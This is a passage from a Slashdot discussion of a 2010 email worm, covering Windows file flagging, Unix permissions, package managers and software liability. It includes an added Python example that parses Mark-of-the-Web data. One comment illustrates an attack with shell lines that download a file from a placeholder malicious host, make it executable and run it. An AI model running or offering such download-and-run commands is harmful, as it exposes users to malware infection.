      You may characterize concerns about monopoly power as categorically illegitimate and overblown in all possible cases. I do not. It is not desirable for anyone to give Microsoft that kind of power over that many users. Centralized package managers just aren't compatible with monopolies and proprietary licenses for a wide variety of good reasons that aren't just going to go away.

      A centralized package manager for Windows is such a great idea that it would have been implemented by now except that there are some damned good reasons why such a thing is destined to fail miserably.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    43. Re:So that's why the UW mail system went down by DinDaddy · · Score: 2, Insightful

      FYI, the iPod Touch models do just about everything the iPhone does, except take pictures and make phone calls.

      You're a week out of date. The new touch has front and rear cameras similar to the new iphone.

      On topic, 150+ of these landed in my email box today. If my company had any sense of fairness, they would harvest the names of everyone infected's email account, and force them to sit through a 4 hour learning module. We already take a yearly 1/2 hour session where they very explicitly explain not to click on links in things like this.

    44. Re:So that's why the UW mail system went down by reboot246 · · Score: 1

      Check out the specs on the new iPod touch 4G.

      "It is essentially an iPhone 4, minus the phone and SMS functions. Jobs himself stated this in no uncertain words in his presentation."

    45. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      Windows does do this. An executable (.exe or .scr) that was downloaded using a supported browser (IE, Firefox?, Chrome) or an e-mail client (Outlook) must be permitted by the user to run. It gets permanently flagged as unsafe. To de-flag the file, you have to edit its properties or check an extra tickbox in the warning dialog. Here is what it looks like.

    46. Re:So that's why the UW mail system went down by afabbro · · Score: 1

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to? Maybe the iPod/iPad approach is better for most people.

      I'm not sure that would have made any difference here. If I run an executable, it can look at my address book, send emails, etc., without any special elevated privileges. Same thing could happen on Unix - it's just that Unix isn't as widely deployed.

      --
      Advice: on VPS providers
    47. Re:So that's why the UW mail system went down by symbolset · · Score: 1

      In the business world, there still isn't a replacement for it that's good enough.

      You know, since we're in the 2010 Email Worm thread I have to ask: Is there a worse one?

      --
      Help stamp out iliturcy.
    48. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      Since we're off topic, can someone explain why Thunderbird is better than Outlook?
      No heavy details needed, just a summary with a little explanation.
      A business case from 93 Escort Wagon would be appreciated.

    49. Re:So that's why the UW mail system went down by MichaelSmith · · Score: 1

      So how did this happen:

      The malware then drops itself into the Windows directory with a file name of CSRSS.EXE, which is identical to a legitimate Windows file. From there, it's 2001 all over again, as the worm attempts to mail itself to all of the contacts in the victim's Outlook address book.

      Does the flagging mechanism not notice that the file has changed?

    50. Re:So that's why the UW mail system went down by causality · · Score: 1

      That's why I'd like to see Microsoft forced to assume product liability so long as they market their software to the general public on the basis of "ease of use". Either market it to "technically knowledgeable users only" or pay monetary damages to anyone and everyone who suffers in any way due to security issues.

      I agree. Likewise, Volkswagen should be sued into bankruptcy for marketing their vehicles as "people cars". They should either be forced to change the name to Technischversiertenwagen, or pay monetary damages to anyone and everyone who suffers in any way due to car accidents.

      While I appreciate your sarcasm I believe it is thoroughly misplaced.

      Microsoft has little or nothing in common with car manufacturers. The car manufacturers actually have to meet certain safety/quality standards and face both regulatory and civil liability if they fail. Microsoft doesn't. Drivers have to demonstrate at least enough competence to obtain a license to use car manufacturers' products; computer users don't. Drivers are legally required to observe best practices and are held financially responsible (usually by the requirement that they carry liability insurance) and maybe even criminally responsible for any damages caused by their failure to do so. Car manufacturers who make defective parts can be forced to conduct a recall for which they must bear all expenses. No such requirement applies to Microsoft.

      Microsoft and Volkswagen are not remotely comparable. If you think they should be, then I say let's hold both to the standard that applies to Volkswagen. This wouldn't be unusual anyplace except the software industry. Manufacturers of physical goods of all sorts, not just automobiles that require a license to operate, are expected to pay for their negligence. If software companies want intellectual property to be treated like physical property then let them bear the same amount of liability borne by any manufacturer of physical property. If they don't want that amount of liability then let them abandon the artificial scarcity model that is the essence of intellectual property. Right now they are having their cake and eating it too and I have no idea why anyone would defend this sorry state of affairs.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    51. Re:So that's why the UW mail system went down by causality · · Score: 1

      It is, in part, a long standing design error. The actions for viewing a document and for running an executable are exactly the same. The error was compounded by hiding all evidence in the UI that a given file is actually an executable.

      The result is and was entirely predictable.

      It is an essential part of American culture to have a seething, burning hatred for the practice of addressing and mitigating readily predictable losses before they happen. No one in government does that, few in their personal lives do that, and few in business ever do that. The case could be made that it's part of the anti-intellectualism that is so prevalent, as forethought can be understood as an intellectual activity.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    52. Re:So that's why the UW mail system went down by spun · · Score: 2, Funny

      I've heard this worm only infects users who are prone to both sexually harassing coworkers and stealing from the company. I'm notifying HR.

      --
      - None can love freedom heartily, but good men; the rest love not freedom, but license. -- John Milton
    53. Re:So that's why the UW mail system went down by c6gunner · · Score: 1

      I can't believe you took the time to write that much.

      Point I was making: what you're calling negligence, isn't. If your house gets broken into, you don't get to sue the lock manufacturer because tumblers are so easy to pick. If your car breaks down because you never change the oil, you don't get to sue Ford. If you can't program your VCR clock because you're an idiot, you don't get to sue RCA. And if you fail to grasp these simple concepts, don't expect to be taken seriously.

      And no, I would never want OS manufacturers to be held to the same standards as the car industry, since this would effectively kill off the Open Source movement.

    54. Re:So that's why the UW mail system went down by causality · · Score: 1

      "I think a better route would be make that the default method/policy and make it hard for the average user to it."

      Microsoft marketing droids think otherwise.

      And the free market has shown them right by making Bill Gates one of the richest men on the planet.

      It's a market alright but I wouldn't call it a free market. A free market assumes that everyone involved is rational and acting in their own interests. A staggering level of ignorance on the part of the buyers that is nowhere to be found on the part of the sellers will drastically alter this equation in favor of the sellers. That means it is no longer a mutual agreement between equals. That doesn't make the sellers correct. It makes them more powerful.

      This situation has no claim to legitimacy. It's old-fashioned might-makes-right. The reason why is simple. The degree to which one side is far more powerful than the other is the same degree to which the less-powerful side is no longer making a truly free choice.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    55. Re:So that's why the UW mail system went down by CAIMLAS · · Score: 1, Interesting

      I'm not sure we're reading the same thing, here.

      What is it about UNIX design/philosophy, particularly as it is usually implemented, that prohibits a user from:

      1) clicking on a link in an email
      2) downloading a binary and/or script
      3) running said script/binary (granted, they'd have to chmod +x first, so there's at least a modicum of technical competency required before this would work)
      4) shitting more worms across the Internet as they spam everyone on their Thunderbird/Kmail/whatever address book via their upstream SMTP server

      Seriously. Does the iPhone actually do anything that (say) could not be done with Windows 7? No, not really.

      --
      ~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
    56. Re:So that's why the UW mail system went down by neonmonk · · Score: 1

      Great. So what would you replace it with? Because until thunderbird can at the very least do tables, handle signatures and signature creation elegantly, handle inserted images elegantly, (decent) groupware calendaring without a third party extension, plus a host of other minor and not so minor annoyances, it is not ready for the enterprise.

      Unfortunately, Outlook is the best email client out there. There are no contenders.

    57. Re:So that's why the UW mail system went down by neonmonk · · Score: 1

      This worm isn't Outlook's fault, it has a link to a website, that's it. It's all on the user.

    58. Re:So that's why the UW mail system went down by Missing.Matter · · Score: 2, Insightful

      That's the difference between official repos endorsed and maintained by your distribution and unofficial third-party repos. It certainly doesn't make it impossible, nor is this the intent of the design, but it does ensure that a user who selects third-party repos is doing so at their own risk and has to take the initiative to make them available. That's still a damn sight better than the way things work on Windows.

      Except the official repos don't contain every piece of software out there. I recently tried out the new beta of Ubuntu, and the very first piece of software I wanted to install wasn't in the repo (Opera).

      So say I set a user up with Ubuntu, and tell him to only install software from the package manager. Well, he doesn't care about 99% of the packages in there anyway; he wants software_X which isn't part of the repo, so he searches on how to find it. He stumbles upon some instructions, enters his password happily when prompted, and is saddled with the same worm we're talking about today.

      How has the package manager played any part in saving this user from himself? A package manager is only a form of security if it is the ONLY way to load software onto the machine, and as Apple is finding out it starts getting awful hard approving what software gets admitted.

      There's a significant difference there. Not the least of which is that a user has to go out of their way (often editing config files) to enable a third-party repo.

      So the system is more secure because it's a pain in the ass to install new software outside of the distribution's repo, malicious or otherwise. Of course as I've stated above, it really isn't all that hard to install third party software outside of the distro's repo.

    59. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      I don't know what happened. The file needs to run to copy itself. It also needs admin privs. Copying it with the shell retains the flag. Either the person uses XP/below or an ancient Outlook version. The global prevention mechanism I mentioned was backported to XP SP2, as listed here. It also says that IE6 and Outlook 2000 supported an older concept of "unsafe files" (2-3 dozen extensions in total) and prevented/warned of their execution. Either way, this person had to expressly allow the program to run.
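      The "flag" discussed in posts 45 and 59 is the Zone.Identifier alternate data stream that Windows attaches to files saved by a browser or mail client (the Mark of the Web). As an added example that is not from any poster, here is a Python reader for that stream's [ZoneTransfer] text, run over constructed samples so it works on any OS; on Windows the real stream is read by opening path + ":Zone.Identifier", and the triage helper and the .invalid URLs below are this example's own.

```python
"""Inspect Mark-of-the-Web data as Windows stores it in the Zone.Identifier stream.

Added example, not from any poster. On Windows the stream of a file is readable as
open(path + ":Zone.Identifier"); the samples below are constructed so it runs anywhere.
"""
import configparser
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# URLMON security zone ids that the Attachment Execution Service writes
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}


@dataclass
class MarkOfTheWeb:
    zone_id: int
    referrer_url: Optional[str]
    host_url: Optional[str]

    @property
    def zone_name(self) -> str:
        return ZONE_NAMES.get(self.zone_id, f"Unknown zone {self.zone_id}")

    @property
    def triggers_warning(self) -> bool:
        # Windows warns before running files marked Internet or Restricted sites.
        return self.zone_id >= 3


def parse_zone_identifier(stream: str) -> Optional[MarkOfTheWeb]:
    """Parse the INI-style text of a Zone.Identifier stream.

    Returns None when the text carries no usable [ZoneTransfer] section,
    which is how an unmarked (locally created or unblocked) file looks.
    """
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep key case exactly as written
    try:
        parser.read_string(stream)
    except configparser.Error:
        return None
    if not parser.has_section("ZoneTransfer"):
        return None
    section = parser["ZoneTransfer"]
    try:
        zone_id = int(section.get("ZoneId", "").strip())
    except ValueError:
        return None
    return MarkOfTheWeb(zone_id, section.get("ReferrerUrl"), section.get("HostUrl"))


def triage(files: Dict[str, Optional[str]]) -> List[Tuple[str, str]]:
    """Return (name, zone_name) for every file whose mark would trigger a warning."""
    flagged = []
    for name, stream in files.items():
        motw = parse_zone_identifier(stream) if stream is not None else None
        if motw and motw.triggers_warning:
            flagged.append((name, motw.zone_name))
    return flagged


# Constructed sample streams; file names and URLs are placeholders, not real indicators.
SAMPLE_FILES = {
    "download-from-browser.exe": (
        "[ZoneTransfer]\r\nZoneId=3\r\n"
        "ReferrerUrl=http://example.invalid/page\r\n"
        "HostUrl=http://example.invalid/file.exe\r\n"
    ),
    "saved-from-mail-client.scr": "[ZoneTransfer]\r\nZoneId=3\r\n",
    "copied-from-share.exe": "[ZoneTransfer]\r\nZoneId=1\r\n",
    "locally-built.exe": None,  # no stream at all
    "unblocked.exe": "",  # stream emptied by the user, parses to nothing
}

if __name__ == "__main__":
    for name, zone in triage(SAMPLE_FILES):
        print(f"{name}: marked {zone}, Windows will warn before running it")
```

      Copying a marked file with Explorer keeps the stream on the copy, which is why the flag survives the "drop into the Windows directory" step only if the worm copies itself that way; a program writing a fresh file gets no mark unless it adds one.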

    60. Re:So that's why the UW mail system went down by profplump · · Score: 1

      No, they really shouldn't. They should temporarily authenticate as a privileged user to install new software, then return to their normal, unprivileged state to actually run it.

    61. Re:So that's why the UW mail system went down by lorenlal · · Score: 1

      Well, when you deploy proper virus detection and mitigation, the worm can be detected and cleaned post-infection. The process won't have the ability to dink with the virus scanner, the core OS files, or bootloader unless the worm can take advantage of some privilege escalation flaw.

      In Windows, the vast majority of home users run with admin privs, which means the scanner needs to be able to pick off the infection before the infection occurs. In many of those cases, the system becomes compromised in a way that the scanner is disabled, or can't update, or the virus is able to hide itself from the OS.

      So, sure an end user could download and execute the worm, but the Unix example is significantly easier to contain... Unless of course the worm leverages a flaw in the OS... In that case all bets are off.

    62. Re:So that's why the UW mail system went down by MeNeXT · · Score: 1

      Is there any reason to run an executable directly from an email or straight off the Net?

      --
      DRM? No thanks, I'll just get it somewhere else...
    63. Re:So that's why the UW mail system went down by DAldredge · · Score: 1

      The next to last ios exploit was caused by simply clicking on a pdf file so it appears they really aren't that much more secure.

    64. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      Devil's advocate here: is there any reason why a normal non-technical Windows user should be able to run an executable in a directory they are able to write to? Maybe the iPod/iPad approach is better for most people.

      For a normal user, both the executable and the directory in which it is located are read-only.

      someidiot@honeypot:~$ wget http://evilurl/nastyfile -O ~/nastyfile
      someidiot@honeypot:~$ chmod +x ~/nastyfile
      someidiot@honeypot:~$ ~/nastyfile

      Now, you were referring to "installed" programs. But the situation being discussed here is not for "installed" programs. (see the GP)

      The problem with Windows is the vast amount of software that is poorly designed and wants Admin privileges even though it could be designed to carry out its task without them.

      The problem with Windows is backwards compatibility. UAC exists, but had to be neutered to allow older/outdated programs to continue to run.

      Ideally, we would have an architecture where there could be granular executable security (ala SELinux); where programs would only have access to very specific paths/ports/programs despite the privileges of the user.
      Unfortunately (and perhaps by-design) SELinux is _NOT_ very user friendly and provides no way for a standard user to override its protections (AFAIK).

      I guess I'm partial to the BlackBerry approach where you (or your admin) set default rights for programs such as "Internet: Allow/Prompt/Deny, Phone: A/P/D, Files: A/P/D, Email: A/P/D" -- programs can request more access, but the user has the ability to override the request (or accept it).
      That way, you can run "untrusted code" but give it a choice between access to the internet or access to personal information (email, phone, etc), plus, at the "Prompt" level for "Internet", you'll even get details on what sites are being accessed.

      PS: Sorry for the BlackBerry mention, but I was surprised/annoyed to find out that neither Android nor iOS supports overriding the application's requested security permissions. Which is unfortunate, because I really wanted an Android phone but it doesn't meet my paranoia requirements :(
      (wtf does a wallpaper app need access to the phone (and internet) for?!)

    65. Re:So that's why the UW mail system went down by turbidostato · · Score: 1

      "It's a market alright but I wouldn't call it a free market. A free market assumes that everyone involved is rational and acting in their own interests."

      I'm all in with respect to Microsoft being an almost-monopoly and how that affects the market, but I can't sign that one: a free market assumes that everyone *has the means* to be rational and act in their own interests. But having the means and having the interest are different things: if someone wants to go nuts, it is his issue; after all, it couldn't be a free market if you were forced to behave properly with regard to your own interests.

      "less-powerful side is no longer making a truly free choice."

      I've been using Linux almost exclusively for more than a decade (and the times I used Windows in between were because of work considerations, not for my own stuff), so I positively know that making the choice is possible, maybe a bit hard, but possible, so I sadly must correct your previous sentence to "less-powerful side is no longer *wanting* to make a truly free choice". As long as citizens gladly behave like lambs, the greedy will behave as wolves.

    66. Re:So that's why the UW mail system went down by hairyfeet · · Score: 1

      Bingo! Everyone is looking at this from a technical aspect, and it's not a technical problem, it's a case of the dancing bunnies. The user KNOWS it is quite possibly hinky and they don't care because they want to see the bunnies. As long as the user has ANY ability to actually place software on the machine, in other words if we don't all want to live in walled iGardens, then we will simply have these problems... period. Because that is why social engineering works: they wave the bunny, and the user happily bypasses any roadblocks to see said bunny.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    67. Re:So that's why the UW mail system went down by causality · · Score: 1

      I can't believe you took the time to write that much.

      Point I was making: what you're calling negligence, isn't. If your house gets broken into, you don't get to sue the lock manufacturer because tumblers are so easy to pick. If your car breaks down because you never change the oil, you don't get to sue Ford. If you can't program your VCR clock because you're an idiot, you don't get to sue RCA. And if you fail to grasp these simple concepts, don't expect to be taken seriously.

      And no, I would never want OS manufacturers to be held to the same standards as the car industry, since this would effectively kill off the Open Source movement.

      Hang on, I need to approve or disapprove of the amount of writing you did before I can respond to your point. Did too much? Damn you're wordy. Not enough? Clearly you're too lazy. -- I think that makes the point. Reserve the personal shit for someone who desires your opinion, it will be much more effective. Moving on from your self-flattery...

      If the lock manufacturer kept advertising "more secure than ever!" you might have a case. If Ford advertised "more maintenance-free than ever!" you might have a case. If RCA advertised "easier to program than ever before!" you might have a case. They don't. Usually those companies make no claims at all about any of these things. The merit of their products is relative to their performance compared to the competition. But wait: all of those companies have real competition.

      Microsoft is a blatant contrast to all of the above. Also, manufacturer liability makes no sense unless a profit is being made. Most Open Source is not distributed for a profit and is generally made available for no charge at all. It is when you as a customer are paying money that you can reasonably expect to receive something of value in return for that money that works as advertised. That's basic quid pro quo. When you are receiving something for free and no marketing promises are made to you then you don't have grounds to justify any such expectations. Thus it's perfectly reasonable to hold Microsoft to one legal standard and Open Source distributors to another; in fact it'd be unreasonable to do otherwise.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    68. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      The entire UW mail system died yesterday morning.

      Maybe this is why ...

      It's an instance of the reason why. The actual reason is that the users still haven't learned from the last 9 years of experience. The only bad thing is that their stupidity is not self-contained and can affect the networks and computers of others. I say that because this time, it isn't really a technical flaw in Windows since I don't see any reports of the e-mail attachments being automatically executed. This is more like a social engineering attack. It's one that is not remotely new and has provided numerous examples that the even slightly clueful have already learned from.

      Should not have moved off of Groupwise

      LOL

    69. Re:So that's why the UW mail system went down by dbcad7 · · Score: 2, Interesting

      Ok.. I have received an email with an executable file.. please list the steps necessary for me to run it.. I'll wait... ok.. Oh really ? it's that simple ?.. I can't imagine why these tricks don't work on Linux users.. sheesh, I'm scared now.

      --
      waiting for ad.doubleclick.net
    70. Re:So that's why the UW mail system went down by c6gunner · · Score: 1

      When Microsoft touts the "Ease of Use" of their product, clearly they're speaking to the portion of the population with an IQ higher than room temperature. Apparently you're not part of their target demographic. May I offer an alternative?

    71. Re:So that's why the UW mail system went down by SheeEttin · · Score: 1

      Back on topic, what you mention is a very good idea. It's also not new to Apple products at all. That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located are read-only.

      Irrelevant. How easy would it be to prepend ~/bin to $PATH and stick it in there?
      You only need permission to bind to ports
      (Of course, if you wanted to replace a system binary, yeah, you'd need root permissions... But why do that when it's easiest just to do as above?)

    72. Re:So that's why the UW mail system went down by DI4BL0S · · Score: 1

      Limit repos to trusted RA certs and make it unbearably difficult for non-technical users to add self-signed certs to a trusted list (specific to repos maybe).
      Non-technical click-happy users should be protected from themselves with force, and I don't see any problem with limiting repos to trusted RAs, which kicks the ball to repo owners to get trusted certs before they can get their repo exposed...

    73. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      Wasn't pine a U of W creation?

    74. Re:So that's why the UW mail system went down by ampmouse · · Score: 1

      Hey, at least you aren't at that other state university. The one that uses Microsoft-hosted Outlook. If you want an unreliable, insecure, Windows-only email solution with the same privacy implications as hosted Gmail, try Outlook Live!

      Oh, and just to clarify, this is not an option offered by the university, this is the only option.

    75. Re:So that's why the UW mail system went down by drsmithy · · Score: 1

      I think you fail to appreciate the proprietary nature of most Windows software. Even the freeware is closed-source and copyrighted in such a way that you are not authorized to redistribute it. That means you cannot legally operate a repository containing a library of Windows software from a single source, because you'd have to get written permission from the authors of each individual piece of software allowing you to redistribute their software from your single source. It'd be an absolute nightmare and one mistake would make you end up on the wrong end of a lawsuit.
      That is, of course, not beginning to address the issues surrounding the redistribution of commercial for-pay software. Redistributing that without the express blessing of the creator is usually called "piracy" and may be severely punished by the civil courts.

      This is what's called a straw man.

      It's a particularly ridiculous one, as well, since by its logic neither brick and mortar, nor online, software stores (like, say, Steam) could exist due to exactly the same copyright and licensing problems. Hopefully the stupidity of this line of reasoning is obvious.

      Incidentally, there's no need for Microsoft to maintain a repository of software on behalf of others. All they need is a portal that links to registered products directly from the vendors themselves.

      The only way around this would be for Microsoft to create a walled-garden type of environment sort of like Apple's App Store. Then they could dictate what licenses and/or terms of copyright are and are not acceptable. But you better believe that this would raise monopoly issues when that single vendor controls over 90% of the marketshare. Want your software to reach 90% of all desktop users? Then you play by their rules, or else. At that point the software license is no longer between the vendor and the user who is their customer; Microsoft is now the referee whether or not this is against the will of the vendor or user.

      There is no _requirement_ whatsoever for any special or unique licensing terms to exist. None.

      A centralized package manager for Windows is such a great idea that it would have been implemented by now except that there are some damned good reasons why such a thing is destined to fail miserably.

      Package managers exist primarily to address problems that essentially don't exist on Windows, or most other platforms for that matter: locating software that will work on your particular branch of a fractured, inconsistent, unstable platform and minimising dependency hell.

      Finally, your whole premise is broken. The proportion of malware distributed as genuine and legitimate software is practically nonexistent. The same people who are prepared to open up password protected zipfiles in Windows and execute the contents will be chomping at the bit to chmod +x an email attachment so they can see the dancing bunnies.

    76. Re:So that's why the UW mail system went down by causality · · Score: 1

      When Microsoft touts the "Ease of Use" of their product, clearly they're speaking to the portion of the population with an IQ higher than room temperature. Apparently you're not part of their target demographic. May I offer an alternative?

      You're certainly a single-minded one. The subtle disapproval of how I express myself was recognized and rejected so you decided you'd just try harder with a more blatant form of making this personal. Trying to insult me is a sorry substitute for arguing against my position. You can't make me deviate from my position no matter how hard you try to make this personal.

      Most users of Windows are not technically skilled and there's no way that Microsoft doesn't know this. When they tout "ease of use" they are not making an effort to restrict their audience to the technically skilled. When the unskilled purchase Windows, their money is just as green as the skilled users' money. That's why Microsoft likes this arrangement and has no interest in limiting it.

      I want Microsoft to either clearly state that their products are not intended for the technically unskilled or take on the liability for suffering caused by ignorant users who buy into their hype about security and ease-of-use. All of the childishness and belligerence you can possibly summon won't alter this logic. Now, if you have what it takes, then either demonstrate with solid reasoning why my logic is faulty or admit that you cannot.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    77. Re:So that's why the UW mail system went down by drsmithy · · Score: 1

      Perhaps they should just have to explicitly state that they want to run a downloaded program. Enter their password and read a warning.

      Ignoring for a second this is the system already in place...

      History has demonstrated _repeatedly_ that it doesn't work. Heck, there are malware variants that require the end user to open a password-protected zipfile and execute the contents. Throwing another "are you sure" dialog up does nothing whatsoever to stop people from trying to see the dancing bunnies.

      The fundamental problem is this: you cannot secure a platform where an ignorant end user is allowed to run arbitrary software at elevated privileges.

    78. Re:So that's why the UW mail system went down by 93+Escort+Wagon · · Score: 1

      Hey, at least you aren't at that other state university. The one that uses Microsoft hosted Outlook. If you want an unreliable, insecure, Windows-only email solution with the same privacy implications as hosted Gmail, try Outlook Live!

      Oh, and just to clarify, this is not an option offered by the university, this is the only option.

      Well, we have that as an option too - but it's only an option, and since Gmail has the mindshare most of the students go for that (actually, most just forward everything to their personal Gmail account, honestly).

      It is funny how, over the course of the past 5-6 years, Microsoft has lost most of its mindshare - with younger people anyway; but that's who really matters in this.

      From what I can tell, the only people choosing the hosted Outlook solution are people directly under soon-to-be-ex-President Emmert's sway. But I'm sure loads o' Microsoft cash had nothing to do with his choice, nor the golf outings with Ballmer...

      --
      #DeleteChrome
    79. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      Yes, users are stupid, they never learn... oh, wait, it's our job to either protect them or educate them.

      I think tomorrow I'm going to have to have a little talk with all my stupid users.

      Really, this looking down on our customers is part of what gives IT a bad rap.

    80. Re:So that's why the UW mail system went down by GravityStar · · Score: 1

      The problem with Windows is the vast amount of software that is poorly designed and wants Admin privileges even though it could be designed to carry out its task without them.

      I run Windows as a limited user. It never was the majority of programs. Since 2005-2006, the number of times I need to inappropriately switch to Administrator has shrunk to 0. The number of defective programs encountered is a bit higher, but near 0. Since then, it has just been easier to find an alternative to the defective program, rather than to run it as Admin.

    81. Re:So that's why the UW mail system went down by hairyfeet · · Score: 1

      Actually I have found that Windows ALREADY HAS something similar, you just have to tell folks to go there...it's called Ninite. As a PC repairman I've found a good 80-90% of the "I can't open X" "I want to (insert task)" can simply be taken care of by pointing them to Ninite. And yes you can have proprietary as well as FOSS, as Ninite has MS Office 2k7 trial alongside OO.o. It would be trivial for MSFT to create something similar, as I'm sure many software houses would loooove to have their software offered alongside MSFT's in a Windows Update style "app store".

      The REAL problem would be MSFT getting buried alive in lawsuits. Look at all that BS in the EU over the browser, when it is so fucking trivial to change a browser nowadays it ain't even funny. Can you imagine the lawsuits from every company whose crapware wasn't included? You'd have Real having a fit their bloatware wasn't included, or Apple having a fit the first link under media players wasn't iTunes, it would be a fricking mess. Hell I was amazed they were even allowed to put Windows Defender in, I figured the anti-spyware companies would have a shitfit.

      So let's be honest folks, the kind of real changes it would take to really kill this kind of threat, like making it really hard to install apps not signed by MSFT or having a default repo, would end up with MSFT being sued for the next 20 years and tied up in court forever. I don't see why so many guys here have a shitfit about MSFT anyway, it is pretty obvious the next wave will be the phone and ultramobile space, and it is pretty damned obvious by now MSFT sucks at mobile and have a snowball's chance in hell of getting that monopoly. Nope, the funny part is everyone will just replace Darth Gates with Darth Jobs, All Hail Steve! Sadly talking to folks I've found this video to practically be a documentary.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    82. Re:So that's why the UW mail system went down by KahabutDieDrake · · Score: 1

      So you want microsoft to take liability for their users inability to operate the machine? Do you know how that's going to look in court?
      ATT: Did you read the user manual?
      LUSER: There is a manual?
      JUDGE: Facepalm
      JURY: obviously you should have
      ATT: smiles evilly.

    83. Re:So that's why the UW mail system went down by hairyfeet · · Score: 1

      Hi MR AC! Sorry for being OT, but I'm afraid you cause the big brain hurt and I wants to know why, oh why, did you use Anonymouse to go to a fucking MSFT kb article? Are you afraid MSFT is gonna hunt you down and beat you? It isn't a porn site, I doubt anyone is gonna have a shitfit, even if you have a strict boss, that you looked at a MSFT kb article, so why MR AC, why?

      --
      ACs don't waste your time replying, your posts are never seen by me.
    84. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      I didn't do it intentionally. I used Anonymouse because I reached the posting limit. But when you preview a post using it, the website rewrites the URLs in the message body. I forgot to re-edit the link before submitting the post again. Oops! Sorry. Actual link: KB925330.

    85. Re:So that's why the UW mail system went down by kwbauer · · Score: 1

      So, *nix users generally only get their apps from an app store except we say that we are getting executables from a repository. Who acts as the gatekeeper for the repository? If it is fully open so that anybody can put anything in, then what prevents malware from getting in it? If only a blessed few are allowed to put something in, then how is this really different than Apple's App Store?

      Just askin'.

      Correct, I haven't used a *nix variant since college nearly 20 years ago.

      Wrong, I use Windows at home and work but my wife and daughter own a couple of older iPods.

    86. Re:So that's why the UW mail system went down by cbhacking · · Score: 1

      I don't know what versions of Outlook or Thunderbird you're talking about specifically, but TB 3 is still well behind Outlook 2010, and TB 2 was in many ways a worse email client than Windows Mail (the free Outlook Express++ that came with Vista). Thunderbird is a good email client, but it's definitely not a great one. It is lighter weight than Outlook, at least aside from its indexing (which is always going to be somewhat performance-intensive) but on a modern desktop or even most laptops the difference is negligible.

      --
      There's no place I could be, since I've found Serenity...
    87. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      You fail to recognize that, despite this, users on GNU/Linux aren't installing random software. They have a specific place to go to get software. It is very simple to educate users on what is and is not safe. You say "Ubuntu Software Center is safe. If you want or need to install anything else call technical support. Here is the number- 1-888-39-THINK, (or whatever the company is that sold the systems/support/os/etc)" It is that simple. In Microsoft-land you're basically stuck wondering and can easily click stuff and unintentionally get infected. You don't even have to do that. Not to mention all the core applications on GNU/Linux have security updates through the package management systems. Your flash players, office software, and operating system files that are going to be vulnerable and easily attackable and affect a wide population of users just aren't vulnerable because patches get pushed through to users for all the applications and not just some. A user clicks one button to update everything, not hundreds of buttons for each application that needs updating. It's a lot easier and less complicated than having to update AV software, Java, Adobe Flash, Firefox, MS Windows, e-mail client software, amongst possibly hundreds of other applications. Microsoft Windows users who self-administer spend thousands of dollars on anti-virus and virus removal software INDIVIDUALLY. Staples, BestBuy, etc usually sell Norton 360 for $69.99 per year. And users still get infected. That means every few years (if not more) customers need to spend an additional $200 on virus removals (once again Staples, BestBuy prices- the $69.99 intro prices they run are gimmicks and worthless- it's just so they can up-sell on the system restore, data backups, OS reloads, and software installation services amongst others and new AV software).

    88. Re:So that's why the UW mail system went down by Chris+Tucker · · Score: 1

      "That would sit better with me than the Apple "We fucking own you" approach that requires you to physical hack the product you just "bought.""

      Yeah, here's the thing:

      YOU are not the target audience for the iPod/iPad/iPhone.

      YOU have never been the target audience for the iPod/iPad/iPhone.

      YOU will never be the target audience for the iPod/iPad/iPhone.

      The reason that the iPod/iPad/iPhone are such phenomenal best sellers is that the vast majority of people BUYING the iPod/iPad/iPhone, don't care a fat rat's ass about hacking their iPod/iPad/iPhone.

      They just want it to work. They just want a seamless, one click method to get files from the iTunes Store or the App Store onto their iPod/iPad/iPhone.

      What you think is immaterial to them. What IS material to them is that it just works.

      So, do continue to vent your spleen here at /., where you'll find a ready and enthusiastic audience.

      Keep in mind that you are, essentially, pissing into the wind.

      All that's going to happen is that you wind up with a facefull of your own piss and Steve Jobs makes another few hundred million dollars.

      kthnxbai!

      --
      Guaranteed! This comment 100% Anthrax free!
    89. Re:So that's why the UW mail system went down by prichardson · · Score: 1

      I see by your Facebook page that you mean the University of Washington. The REAL UW (Wisconsin) had no trouble with email today.

      --
      Help I'm a rock.
    90. Re:So that's why the UW mail system went down by jimicus · · Score: 1

      I'd point out a few things here:

      1. If, as a mail admin, you are still allowing Windows executables of any description through your system, you should be shot. Hell, Microsoft publish a list of potentially dangerous filetypes you might want to block in email, so you've really got zero excuse. Let's face it, if education was going to work it would have done so years ago.

      2. If, as a desktop admin, your users are using a mail client that allows them to just randomly open Windows executables and is not/cannot be configured otherwise, you also should be shot. Outlook has gone out of its way to make it difficult to open executable attachments for some time.

      3. Of those 9 years:

          - 5 or 6 days has been spent teaching that "opening every attachment you see is a Bad Idea".
          - 8 years, 361 days have been spent teaching that "the correct way to deal with any popup you see is to click on the first button on it that'll get rid of the thing. No point in reading it, they never say anything useful anyway."

    91. Re:So that's why the UW mail system went down by jimicus · · Score: 1

      The problem with Windows is the vast amount of software that is poorly designed and wants Admin privileges even though it could be designed to carry out its task without them.

